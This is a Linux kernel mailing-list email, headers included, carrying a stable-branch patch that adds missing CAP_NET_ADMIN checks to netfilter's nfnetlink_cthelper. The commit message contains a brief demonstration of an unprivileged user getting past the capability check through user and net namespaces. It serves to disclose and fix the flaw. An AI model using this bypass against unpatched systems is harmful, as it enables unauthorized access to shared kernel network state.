Received: by 10.223.176.5 with SMTP id f5csp3367860wra; Mon, 29 Jan 2018 12:14:22 -0800 (PST) X-Google-Smtp-Source: AH8x226vuQhYo9URsHgEzdWyCVBB1fGyLHaL6WGrvH09mdAIPvtytOOMI6MrlbgFEQQ+ThlYKv9B X-Received: by 10.99.177.76 with SMTP id g12mr5441740pgp.269.1517256862016; Mon, 29 Jan 2018 12:14:22 -0800 (PST) ARC-Seal: i=1; a=rsa-sha256; t=1517256861; cv=none; d=google.com; s=arc-20160816; b=mdEzFKWAH6osis8XqGzQxCTNvg9Y4YnQt1+MjsqfJpHGBZ3L8Zn7oskkLJu1tG5pZ4 Ph/ia9GVC+RK4EWPLUxRtOgbL55gSzA409DS2MIglF/sy5L3JrF36+WrKJ29mWwx8gga 7zFG2IO6M9g0dE+BAO+e5Jc5KCiluy+btjs3jQdP3yDCB4WeOz1gPjkSzKZu33fC03Fv 36WKhvAJ4C+SWZ5SSyDiEamBnpGoPsbgkqSBd2y75W2CzkGilLu8O4pdgOpOhlWWzAO3 roD/OZWNmkhtGMrmAziTE/hqEUFTZ/T4qzDprEoz8etI5z3iM0xf+ZcmIfmAsA88TOZs d2ow== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=list-id:precedence:sender:mime-version:user-agent:references :in-reply-to:message-id:date:subject:cc:to:from :arc-authentication-results; bh=Fe/Orc+OMkb0MfpcIVqyRTceEXDWYSVqYVJ7UGt/zxo=; b=Hw9JSS6TR4ZpcudtyPLLVB+D5gumo1q9UBhYamCS8Xb1qlkSx9glccp3WHh3c3w3E0 doQeoVDRQeRGNTTzPPI3M2MjIqPfWjeAsUaXEE8ObrpblT1jIs7vIWOMoa6j6ub9DjrH GrRXhB6BwgOdPER1GBkzoSobHKlkyfJlld5kyxcLE0Genlo5f2aKLLjyWjMkRDE2PSi0 0ykzDX68Cche59aV5utG5fBOj1TkyJcXtJxMLbraxd004afKwRbBkD3BJ1ql1+L21yLn 7Hg3ytyrvIKr/Za/enL8X6IyP2yDVJXbsTHcIwZIN5t7ie6FKnSigw31VmqloMrxzDFn 6qDA== ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: best guess record for domain of linux-kernel-owner@vger.kernel.org designates 209.132.180.67 as permitted sender) smtp.mailfrom=linux-kernel-owner@vger.kernel.org Return-Path: Received: from vger.kernel.org (vger.kernel.org. [209.132.180.67]) by mx.google.com with ESMTP id k10si7972083pgs.499.2018.01.29.12.14.07; Mon, 29 Jan 2018 12:14:21 -0800 (PST) Received-SPF: pass (google.com: best guess record for domain of linux-kernel-owner@vger.kernel.org designates 209.132.180.67 as permitted sender) client-ip=209.132.180.67; Authentication-Results: mx.google.com; spf=pass (google.com: best guess record for domain of linux-kernel-owner@vger.kernel.org designates 209.132.180.67 as permitted sender) smtp.mailfrom=linux-kernel-owner@vger.kernel.org Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S1753933AbeA2UMa (ORCPT + 99 others); Mon, 29 Jan 2018 15:12:30 -0500 Received: from mail.linuxfoundation.org ([140.211.169.12]:35000 "EHLO mail.linuxfoundation.org" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S1752834AbeA2UM3 (ORCPT ); Mon, 29 Jan 2018 15:12:29 -0500 Received: from localhost (LFbn-1-12258-90.w90-92.abo.wanadoo.fr [90.92.71.90]) by mail.linuxfoundation.org (Postfix) with ESMTPSA id 290292EA4; Mon, 29 Jan 2018 12:59:05 +0000 (UTC) From: Greg Kroah-Hartman To: linux-kernel@vger.kernel.org Cc: Greg Kroah-Hartman , stable@vger.kernel.org, Kevin Cernekee , Pablo Neira Ayuso , Michal Kubecek Subject: [PATCH 3.18 30/52] netfilter: nfnetlink_cthelper: Add missing permission checks Date: Mon, 29 Jan 2018 13:56:48 +0100 Message-Id: <20180129123629.506022968@linuxfoundation.org> X-Mailer: git-send-email 2.16.1 In-Reply-To: <20180129123628.168904217@linuxfoundation.org> References: <20180129123628.168904217@linuxfoundation.org> User-Agent: quilt/0.65 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Sender: linux-kernel-owner@vger.kernel.org Precedence: bulk List-ID: X-Mailing-List: linux-kernel@vger.kernel.org 3.18-stable review patch. If anyone has any objections, please let me know. ------------------ From: Kevin Cernekee commit 4b380c42f7d00a395feede754f0bc2292eebe6e5 upstream. The capability check in nfnetlink_rcv() verifies that the caller has CAP_NET_ADMIN in the namespace that "owns" the netlink socket. However, nfnl_cthelper_list is shared by all net namespaces on the system. An unprivileged user can create user and net namespaces in which he holds CAP_NET_ADMIN to bypass the netlink_net_capable() check: $ nfct helper list nfct v1.4.4: netlink error: Operation not permitted $ vpnns -- nfct helper list { .name = ftp, .queuenum = 0, .l3protonum = 2, .l4protonum = 6, .priv_data_len = 24, .status = enabled, }; Add capable() checks in nfnetlink_cthelper, as this is cleaner than trying to generalize the solution. Signed-off-by: Kevin Cernekee Signed-off-by: Pablo Neira Ayuso Acked-by: Michal Kubecek Signed-off-by: Greg Kroah-Hartman --- net/netfilter/nfnetlink_cthelper.c | 10 ++++++++++ 1 file changed, 10 insertions(+) --- a/net/netfilter/nfnetlink_cthelper.c +++ b/net/netfilter/nfnetlink_cthelper.c @@ -17,6 +17,7 @@ #include #include #include +#include #include #include @@ -392,6 +393,9 @@ nfnl_cthelper_new(struct sock *nfnl, str struct nfnl_cthelper *nlcth; int ret = 0; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (!tb[NFCTH_NAME] || !tb[NFCTH_TUPLE]) return -EINVAL; @@ -595,6 +599,9 @@ nfnl_cthelper_get(struct sock *nfnl, str struct nfnl_cthelper *nlcth; bool tuple_set = false; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (nlh->nlmsg_flags & NLM_F_DUMP) { struct netlink_dump_control c = { .dump = nfnl_cthelper_dump_table, @@ -661,6 +668,9 @@ nfnl_cthelper_del(struct sock *nfnl, str struct nfnl_cthelper *nlcth, *n; int j = 0, ret; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (tb[NFCTH_NAME]) helper_name = nla_data(tb[NFCTH_NAME]);